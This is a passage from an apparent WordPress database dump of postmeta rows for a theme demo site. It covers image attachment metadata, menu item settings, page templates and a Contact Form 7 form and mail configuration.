\"keywords\";a:0:{}}}'),(55,36,'_wp_attached_file','2021/05/slider1.jpg'),(56,36,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1400;s:6:\"height\";i:816;s:4:\"file\";s:19:\"2021/05/slider1.jpg\";s:8:\"filesize\";i:204435;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"slider1-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11842;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"slider1-1024x597.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:597;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108905;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"slider1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6054;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"slider1-768x448.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:448;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64164;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:19:\"slider1-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22789;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:18:\"slider1-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2821;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(58,39,'_wp_attached_file','2021/05/testimonial-bg-img.jpg'),(59,39,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1400;s:6:\"height\";i:811;s:4:\"file\";s:30:\"2021/05/testimonial-bg-img.jpg\";s:8:\"filesize\";i:63833;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"testimonial-bg-img-300x174.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1924;}s:5:\"large\";a:5:{s:4:\"file\";s:31:\"testimonial-bg-img-1024x593.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17286;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"testimonial-bg-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1446;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"testimonial-bg-img-768x445.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10299;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:30:\"testimonial-bg-img-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3930;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:29:\"testimonial-bg-img-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1197;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(60,60,'_wp_attached_file','2021/05/project-img2.png'),(61,60,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:50;s:6:\"height\";i:51;s:4:\"file\";s:24:\"2021/05/project-img2.png\";s:8:\"filesize\";i:5259;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(63,130,'_menu_item_type','post_type'),(64,130,'_menu_item_object_id','336'),(65,130,'_menu_item_object','page'),(66,130,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(67,130,'_wp_old_date','2021-05-27'),(69,144,'_menu_item_type','custom'),(70,144,'_menu_item_object_id','144'),(71,144,'_menu_item_object','custom'),(72,144,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(73,144,'_menu_item_url','#'),(74,144,'_wp_old_date','2021-05-27'),(75,197,'_menu_item_type','post_type'),(76,197,'_menu_item_object_id','336'),(77,197,'_menu_item_object','page'),(78,197,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(80,198,'_menu_item_type','post_type'),(81,198,'_menu_item_object_id','154'),(82,198,'_menu_item_object','page'),(83,198,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(90,200,'_menu_item_type','post_type'),(91,200,'_menu_item_object_id','140'),(92,200,'_menu_item_object','page'),(93,200,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(95,201,'_menu_item_type','post_type'),(96,201,'_menu_item_object_id','191'),(97,201,'_menu_item_object','page'),(98,201,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(100,202,'_menu_item_type','post_type'),(101,202,'_menu_item_object_id','160'),(102,202,'_menu_item_object','page'),(103,202,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(105,224,'_wp_attached_file','2021/05/services-single.jpg'),(106,224,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:372;s:6:\"height\";i:493;s:4:\"file\";s:27:\"2021/05/services-single.jpg\";s:8:\"filesize\";i:69950;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"services-single-226x300.jpg\";s:5:\"width\";i:226;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20277;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"services-single-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8733;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:27:\"services-single-372x270.jpg\";s:5:\"width\";i:372;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25640;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:26:\"services-single-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4612;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(108,232,'_menu_item_type','post_type'),(109,232,'_menu_item_object_id','229'),(110,232,'_menu_item_object','page'),(111,232,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(112,232,'_wp_old_date','2021-05-27'),(115,233,'_menu_item_type','post_type'),(116,233,'_menu_item_object_id','215'),(117,233,'_menu_item_object','page'),(118,233,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(119,233,'_wp_old_date','2021-05-27'),(122,234,'_menu_item_type','post_type'),(123,234,'_menu_item_object_id','226'),(124,234,'_menu_item_object','page'),(125,234,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(126,234,'_wp_old_date','2021-05-27'),(129,258,'_wp_attached_file','2021/05/floor-modification.jpg'),(130,258,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:111;s:6:\"height\";i:66;s:4:\"file\";s:30:\"2021/05/floor-modification.jpg\";s:8:\"filesize\";i:9306;s:5:\"sizes\";a:1:{s:11:\"footerthumb\";a:5:{s:4:\"file\";s:29:\"floor-modification-100x66.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:66;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3700;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(350,359,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:227;s:4:\"file\";s:22:\"2022/08/logo-small.jpg\";s:8:\"filesize\";i:18506;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"logo-small-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6284;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:21:\"logo-small-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3245;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(132,259,'_wp_attached_file','2021/05/roofing.jpg'),(133,259,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:88;s:6:\"height\";i:65;s:4:\"file\";s:19:\"2021/05/roofing.jpg\";s:8:\"filesize\";i:7947;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(135,281,'_menu_item_type','post_type'),(136,281,'_menu_item_object_id','263'),(137,281,'_menu_item_object','page'),(138,281,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(349,359,'_wp_attached_file','2022/08/logo-small.jpg'),(141,282,'_menu_item_object','page'),(142,282,'_menu_item_object_id','269'),(143,282,'_menu_item_type','post_type'),(144,282,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(154,145,'_menu_item_type','custom'),(155,145,'_menu_item_object_id','145'),(156,145,'_menu_item_object','custom'),(157,145,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(158,145,'_menu_item_url','#'),(159,145,'_wp_old_date','2021-05-27'),(167,147,'_menu_item_type','post_type'),(168,147,'_menu_item_menu_item_parent','145'),(169,147,'_menu_item_object_id','140'),(170,147,'_menu_item_object','page'),(171,147,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(172,147,'_wp_old_date','2021-05-27'),(202,164,'_menu_item_type','post_type'),(203,164,'_menu_item_object','page'),(204,164,'_menu_item_object_id','160'),(205,164,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(206,164,'_wp_old_date','2021-05-27'),(208,165,'_menu_item_type','post_type'),(209,165,'_menu_item_object_id','154'),(210,165,'_menu_item_object','page'),(211,165,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(212,165,'_wp_old_date','2021-05-27'),(214,173,'_menu_item_type','post_type'),(215,173,'_menu_item_menu_item_parent','175'),(216,173,'_menu_item_object_id','170'),(217,173,'_menu_item_object','page'),(218,173,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(219,173,'_wp_old_date','2021-05-27'),(221,174,'_menu_item_type','post_type'),(222,174,'_menu_item_menu_item_parent','175'),(223,174,'_menu_item_object_id','166'),(224,174,'_menu_item_object','page'),(225,174,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(226,174,'_wp_old_date','2021-05-27'),(228,175,'_menu_item_type','custom'),(229,175,'_menu_item_object_id','175'),(230,175,'_menu_item_object','custom'),(231,175,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(232,175,'_menu_item_url','#'),(233,175,'_wp_old_date','2021-05-27'),(234,193,'_menu_item_type','post_type'),(235,193,'_menu_item_menu_item_parent','175'),(236,193,'_menu_item_object_id','191'),(237,193,'_menu_item_object','page'),(238,193,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(239,193,'_wp_old_date','2021-05-27'),(241,235,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(242,235,'_menu_item_object','page'),(243,235,'_menu_item_object_id','229'),(244,235,'_menu_item_menu_item_parent','164'),(245,235,'_menu_item_type','post_type'),(246,235,'_wp_old_date','2021-05-27'),(249,236,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(250,236,'_menu_item_object','page'),(251,236,'_menu_item_object_id','215'),(252,236,'_menu_item_menu_item_parent','164'),(253,236,'_menu_item_type','post_type'),(254,236,'_wp_old_date','2021-05-27'),(257,237,'_menu_item_menu_item_parent','164'),(258,237,'_menu_item_type','post_type'),(259,237,'_menu_item_object_id','226'),(260,237,'_menu_item_object','page'),(261,237,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(262,237,'_wp_old_date','2021-05-27'),(265,331,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(266,331,'_menu_item_object','page'),(267,331,'_menu_item_object_id','263'),(268,331,'_menu_item_menu_item_parent','164'),(269,331,'_menu_item_type','post_type'),(272,332,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(273,332,'_menu_item_object','page'),(274,332,'_menu_item_object_id','269'),(275,332,'_menu_item_menu_item_parent','164'),(276,332,'_menu_item_type','post_type'),(348,358,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:568;s:4:\"file\";s:22:\"2022/08/logo-large.jpg\";s:8:\"filesize\";i:55879;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"logo-large-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12191;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"logo-large-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6430;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:22:\"logo-large-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17135;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:21:\"logo-large-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3316;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(347,358,'_wp_attached_file','2022/08/logo-large.jpg'),(288,335,'_wp_page_template','default'),(289,336,'_wp_page_template','templates/page-builder.php'),(295,140,'_wp_page_template','templates/contact-layout1.php'),(297,154,'_wp_page_template','templates/page-builder.php'),(299,160,'_wp_page_template','templates/page-builder.php'),(301,166,'_wp_page_template','templates/page-builder.php'),(303,170,'_wp_page_template','templates/page-builder.php'),(305,191,'_wp_page_template','templates/page-fullwidth_template.php'),(306,215,'_wp_page_template','templates/page-builder.php'),(308,226,'_wp_page_template','templates/page-builder.php'),(310,229,'_wp_page_template','templates/page-builder.php'),(312,263,'_wp_page_template','templates/page-builder.php'),(316,269,'_wp_page_template','templates/page-builder.php'),(318,337,'_form','<label> Your name\n    [text* your-name] </label>\n\n<label> Your email\n    [email* your-email] </label>\n\n<label> Subject\n    [text* your-subject] </label>\n\n<label> Your message (optional)\n    [textarea your-message] </label>\n\n[submit \"Submit\"]'),(319,337,'_mail','a:8:{s:7:\"subject\";s:30:\"[_site_title] \"[your-subject]\"\";s:6:\"sender\";s:44:\"[_site_title] <wordpress@sktperfectdemo.com>\";s:4:\"body\";s:163:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:9:\"recipient\";s:19:\"[_site_admin_email]\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(320,337,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:30:\"[_site_title] \"[your-subject]\"\";s:6:\"sender\";s:44:\"[_site_title] <wordpress@sktperfectdemo.com>\";s:4:\"body\";s:105:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:29:\"Reply-To: [_site_admin_email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(321,337,'_messages','a:12:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";}'),(322,337,'_locale','en_US'),(357,363,'_wp_attached_file','2022/08/cropped-favicon2.jpg'),(358,363,'_wp_attachment_context','site-icon'),(359,363,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:28:\"2022/08/cropped-favicon2.jpg\";s:8:\"filesize\";i:24613;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"cropped-favicon2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11775;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"cropped-favicon2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4935;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:28:\"cropped-favicon2-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12219;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:27:\"cropped-favicon2-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2909;}s:13:\"site_icon-270\";a:5:{s:4:\"file\";s:28:\"cropped-favicon2-270x270.jpg\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10562;}s:13:\"site_icon-192\";a:5:{s:4:\"file\";s:28:\"cropped-favicon2-192x192.jpg\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6696;}s:13:\"site_icon-180\";a:5:{s:4:\"file\";s:28:\"cropped-favicon2-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6349;}s:12:\"site_icon-32\";a:5:{s:4:\"file\";s:26:\"cropped-favicon2-32x32.jpg\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:772;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(355,362,'_wp_attached_file','2022/08/favicon2.jpg'),(356,362,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:171;s:6:\"height\";i:131;s:4:\"file\";s:20:\"2022/08/favicon2.jpg\";s:8:\"filesize\";i:8853;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"favicon2-150x131.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:131;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5276;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:19:\"favicon2-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3062;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(369,263,'_edit_lock','1661385987:1'),(372,263,'_edit_last','1'),(373,229,'_edit_last','1'),(374,229,'_edit_lock','1661301070:1'),(375,269,'_edit_last','1'),(376,269,'_edit_lock','1661360828:1'),(377,226,'_edit_last','1'),(378,226,'_edit_lock','1661281646:1'),(383,140,'_edit_lock','1661387272:1'),(390,335,'_edit_lock','1661300364:1'),(412,140,'_edit_last','1'),(405,336,'_edit_lock','1661386817:1'),(406,386,'_wp_attached_file','2022/08/32926267_2062360403778390_9097229843803668480_n.jpg'),(407,386,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:466;s:6:\"height\";i:960;s:4:\"file\";s:59:\"2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\";s:8:\"filesize\";i:50251;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"32926267_2062360403778390_9097229843803668480_n-146x300.jpg\";s:5:\"width\";i:146;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10003;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"32926267_2062360403778390_9097229843803668480_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6030;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"32926267_2062360403778390_9097229843803668480_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17582;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"32926267_2062360403778390_9097229843803668480_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3148;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(417,6,'_config_errors','a:1:{s:11:\"mail.sender\";a:1:{i:0;a:2:{s:4:\"code\";i:103;s:4:\"args\";a:3:{s:7:\"message\";s:0:\"\";s:6:\"params\";a:0:{}s:4:\"link\";s:70:\"https://contactform7.com/configuration-errors/email-not-in-site-domain\";}}}}'),(419,396,'_menu_item_type','post_type'),(420,396,'_menu_item_menu_item_parent','0'),(421,396,'_menu_item_object_id','269'),(422,396,'_menu_item_object','page'),(423,396,'_menu_item_target',''),(424,396,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(425,396,'_menu_item_xfn',''),(426,396,'_menu_item_url',''),(468,403,'_menu_item_object','page'),(428,397,'_menu_item_type','post_type'),(429,397,'_menu_item_menu_item_parent','0'),(430,397,'_menu_item_object_id','263'),(431,397,'_menu_item_object','page'),(432,397,'_menu_item_target',''),(433,397,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(434,397,'_menu_item_xfn',''),(435,397,'_menu_item_url',''),(467,403,'_menu_item_object_id','140'),(437,398,'_menu_item_type','post_type'),(438,398,'_menu_item_menu_item_parent','0'),(439,398,'_menu_item_object_id','229'),(440,398,'_menu_item_object','page'),(441,398,'_menu_item_target',''),(442,398,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(443,398,'_menu_item_xfn',''),(444,398,'_menu_item_url',''),(466,403,'_menu_item_menu_item_parent','0'),(446,399,'_menu_item_type','post_type'),(447,399,'_menu_item_menu_item_parent','0'),(448,399,'_menu_item_object_id','226'),(449,399,'_menu_item_object','page'),(450,399,'_menu_item_target',''),(451,399,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(452,399,'_menu_item_xfn',''),(453,399,'_menu_item_url',''),(465,403,'_menu_item_type','post_type'),(455,400,'_menu_item_type','post_type'),(456,400,'_menu_item_menu_item_parent','0'),(457,400,'_menu_item_object_id','215'),(458,400,'_menu_item_object','page'),(459,400,'_menu_item_target',''),(460,400,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(461,400,'_menu_item_xfn',''),(462,400,'_menu_item_url',''),(469,403,'_menu_item_target',''),(470,403,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(471,403,'_menu_item_xfn',''),(472,403,'_menu_item_url',''),(475,407,'_wp_attached_file','2022/08/17992072_1641106229237145_7019424871005086701_n.jpg'),(476,407,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2022/08/17992072_1641106229237145_7019424871005086701_n.jpg\";s:8:\"filesize\";i:147117;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"17992072_1641106229237145_7019424871005086701_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19637;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"17992072_1641106229237145_7019424871005086701_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6925;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"17992072_1641106229237145_7019424871